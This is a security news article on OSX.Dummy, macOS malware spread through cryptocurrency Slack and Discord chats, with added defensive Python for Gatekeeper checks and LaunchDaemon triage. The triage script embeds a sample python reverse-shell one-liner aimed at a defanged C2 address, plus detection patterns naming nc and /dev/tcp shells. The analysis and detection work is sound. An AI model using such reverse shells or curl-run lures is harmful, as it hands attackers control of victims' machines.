Cryptocurrency community targeted by macOS malware




     Attackers are using macOS malware to target cryptocurrency investors on the Slack and Discord chat platforms. The malware, dubbed OSX.Dummy, uses an unsophisticated infection method, but a successful infection hands the attacker remote arbitrary code execution: if the connection to the attacker's command-and-control (C&C) server succeeds, the attacker can run arbitrary commands as root on the infected system. The malware was first spotted and described by researcher Remco Verhoef, who posted his findings early Friday to the SANS InfoSec Handlers Diary blog and said he had observed multiple attacks during the previous week.

     There have been multiple macOS malware attacks originating in crypto-related Slack and Discord groups, with the attackers impersonating admins or key people. Small command snippets are shared in chat, and running one downloads and executes a malicious binary: the snippet fetches the 34 MB OSX.Dummy binary with cURL, saves it to /tmp/script and executes it. The file is a large 64-bit Mach-O binary that scored 0/60 on VirusTotal, meaning no engine detected it. The binary is unsigned, which would normally cause Gatekeeper, the macOS control that blocks unsigned software downloaded from the internet, to refuse to run it. Gatekeeper, however, only evaluates files that a browser or other quarantine-aware application has tagged with the com.apple.quarantine extended attribute; a binary fetched with cURL and launched from Terminal carries no such tag, so Gatekeeper never comes into play and the unsigned binary runs.
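To make the Gatekeeper point concrete, here is an added example (my own code, not code from the article or from the researchers it cites) that reads and decodes the com.apple.quarantine attribute and reports whether Gatekeeper would ever have looked at a given file. The attribute format (flags;hex epoch seconds;agent;uuid) is the one written by quarantine-aware downloaders; the sample paths and attribute values are constructed, and the helper names are assumptions of this example.

```python
"""Inspect the macOS quarantine attribute that decides whether Gatekeeper runs.
Added example for this article, not code from the article or its sources; the
sample attribute values below are constructed and the helper names are my own."""
import datetime
import subprocess
from typing import Dict, Optional

QUARANTINE_ATTR = "com.apple.quarantine"


def parse_quarantine(value: str) -> Dict[str, object]:
    """Decode the attribute value 'flags;hex-epoch-seconds;agent;uuid' that a
    quarantine-aware downloader (Safari, Chrome, Mail, ...) writes."""
    parts = value.strip().split(";")
    if len(parts) < 4:
        raise ValueError(f"unexpected quarantine format: {value!r}")
    flags, stamp, agent, uuid = parts[:4]
    return {
        "flags": int(flags, 16),
        "downloaded_at": datetime.datetime.fromtimestamp(int(stamp, 16), datetime.timezone.utc),
        "agent": agent,
        "uuid": uuid,
    }


def read_quarantine(path: str) -> Optional[str]:
    """Return the raw attribute for path, or None when it is absent. Uses the
    macOS xattr tool; on other systems the tool is missing and None is returned."""
    try:
        proc = subprocess.run(["xattr", "-p", QUARANTINE_ATTR, path],
                              capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    if proc.returncode != 0:
        return None
    return proc.stdout.strip() or None


def gatekeeper_will_check(quarantine_value: Optional[str]) -> bool:
    """Gatekeeper evaluates a file only if it carries the quarantine attribute."""
    return quarantine_value is not None


def assess(path: str, quarantine_value: Optional[str]) -> str:
    """One-line verdict on why the file did or did not get a Gatekeeper check."""
    if not gatekeeper_will_check(quarantine_value):
        return (f"{path}: no {QUARANTINE_ATTR} attribute (e.g. fetched with curl and run "
                "from Terminal); Gatekeeper never evaluated it, check the signature by hand")
    info = parse_quarantine(quarantine_value)
    return (f"{path}: quarantined by {info['agent']} at {info['downloaded_at']:%Y-%m-%d %H:%M:%SZ}; "
            "Gatekeeper will evaluate it on first launch")


if __name__ == "__main__":
    # Constructed values: a browser download next to a curl download.
    print(assess("/Users/alice/Downloads/wallet.dmg",
                 "0081;5b400000;Safari;9C0B2C3D-1E2F-4A5B-8C6D-7E8F9A0B1C2D"))
    print(assess("/tmp/script", None))
    # On a real Mac, pass read_quarantine(path) instead of a literal value.
```

On a Mac the equivalent manual checks are `xattr -l <file>` to see whether the attribute exists and `spctl --assess --verbose <file>` to ask Gatekeeper directly; a file that fails the second check but has no quarantine attribute is exactly the case the attackers rely on.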




     Once the binary is running, it invokes sudo to run the malware as root, which requires the user to type their password in Terminal (according to Apple, you must be logged in with an administrator account to run a sudo command in Terminal on your Mac). The malware drops code in several macOS directories, including the launch daemon property list /Library/LaunchDaemons/com.startup.plist, which gives OSX.Dummy persistence across reboots. The daemon runs a bash script that loops, repeatedly running a python command that tries to connect to [185].243.115.[230] on port 1337; the python code creates a reverse shell. At the time of writing, the reverse shell fails to connect.

     Researchers note that if the attack is successful and the malware is able to reach the attacker's C2 server, the attacker can take control of the infected system. The malware was named OSX.Dummy because the path it uses to dump the victim's password is /tmp/dumpdummy, and because almost everything about it is dumb: the infection method, the massive size of the binary, the persistence mechanism, the limited capabilities, the fact that it is trivial to detect at every step, and the fact that it saves the user's password to dumpdummy.
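The persistence mechanism and the indicators above (the launch daemon plist, the looping reverse shell to port 1337, and the dumpdummy path) are easy to triage with a small script. The following is an added example, my own code rather than anything from the article or the researchers: it parses a LaunchDaemon plist, checks the program it launches and the script behind it for the reverse-shell pattern described, and matches the article's indicators. The plist contents, the label com.startup, the script path /tmp/script.sh and the script body are constructed for illustration and are not the malware's actual files; the C2 address is kept defanged with brackets as the article writes it, and the sample script is only a string that is scanned, never executed.

```python
"""Triage a macOS LaunchDaemon plist and the script it launches for the
persistence pattern described above. Added example, not the article's code and
not the malware's real files; plist, label, script path and script body are
constructed. Only the plist path, /tmp/dumpdummy and the defanged C2 come from the article."""
import plistlib
import re
from typing import Dict, List, Optional, Tuple

# A legitimate daemon should not launch anything from a user-writable location.
WRITABLE_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/Users/")

# Indicators from the article, kept defanged the way the article writes them.
IOC_C2 = ("[185].243.115.[230]", 1337)
IOC_FILES = ("/tmp/dumpdummy", "/Library/LaunchDaemons/com.startup.plist")

# Hallmarks of a scripted reverse shell: a socket connect plus file-descriptor
# redirection into an interactive shell, or the classic nc / bash variants.
REVERSE_SHELL_PATTERNS = (
    r"\.connect\(\(",
    r"os\.dup2\(",
    r"/bin/(ba)?sh['\"]?\s*,\s*['\"]-i",
    r"nc\s+-e",
    r"bash\s+-i\s*>&\s*/dev/tcp/",
)

# Constructed sample plist in the shape of a persistence daemon (hypothetical content).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.startup</string>
  <key>ProgramArguments</key><array><string>/bin/sh</string><string>/tmp/script.sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

# Constructed sample of the launched script: an endless loop spawning a python
# reverse shell. The C2 is defanged, so this text cannot connect anywhere.
SAMPLE_SCRIPT = r"""#!/bin/bash
while :
do
    python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("[185].243.115.[230]",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
    sleep 5
done
"""


def refang(text: str) -> str:
    """Strip [ ] defanging so indicator strings compare equal to raw on-disk data."""
    return text.replace("[", "").replace("]", "")


def parse_launch_daemon(plist_bytes: bytes) -> Dict[str, object]:
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    return {
        "label": data.get("Label", ""),
        "program_args": list(args),
        "run_at_load": bool(data.get("RunAtLoad", False)),
        "keep_alive": bool(data.get("KeepAlive", False)),
    }


def extract_c2(script: str) -> Optional[Tuple[str, int]]:
    """Pull the host:port out of a python-style connect(("host", port)) call."""
    m = re.search(r"connect\(\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)\s*\)\)", refang(script))
    return (m.group(1), int(m.group(2))) if m else None


def triage(plist_bytes: bytes, script: str, plist_path: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing matched."""
    findings: List[str] = []
    daemon = parse_launch_daemon(plist_bytes)
    if plist_path in IOC_FILES:
        findings.append(f"known IOC path: {plist_path}")
    for arg in daemon["program_args"]:
        if arg.startswith(WRITABLE_DIRS):
            findings.append(f"daemon runs from user-writable path: {arg}")
    if daemon["run_at_load"] and daemon["keep_alive"]:
        findings.append("RunAtLoad+KeepAlive: restarted at boot and whenever it exits")
    hits = [p for p in REVERSE_SHELL_PATTERNS if re.search(p, script)]
    if hits:
        findings.append(f"reverse-shell pattern(s) in launched script: {', '.join(hits)}")
    c2 = extract_c2(script)
    if c2 == (refang(IOC_C2[0]), IOC_C2[1]):
        findings.append(f"connects to known OSX.Dummy C2 {IOC_C2[0]}:{IOC_C2[1]}")
    elif c2:
        findings.append(f"outbound connect to {c2[0]}:{c2[1]}")
    if re.search(r"while\s*(:|true)", script):
        findings.append("script loops forever retrying the connection")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_PLIST, SAMPLE_SCRIPT, "/Library/LaunchDaemons/com.startup.plist"):
        print("-", line)
```

On a live system you would feed `triage` the bytes of each file under /Library/LaunchDaemons and /Library/LaunchAgents together with whatever script its ProgramArguments points at, and separately check for the existence of /tmp/dumpdummy; a daemon with no findings is not proven clean, but one that launches from /tmp and contains a connect-plus-dup2 pattern deserves immediate attention.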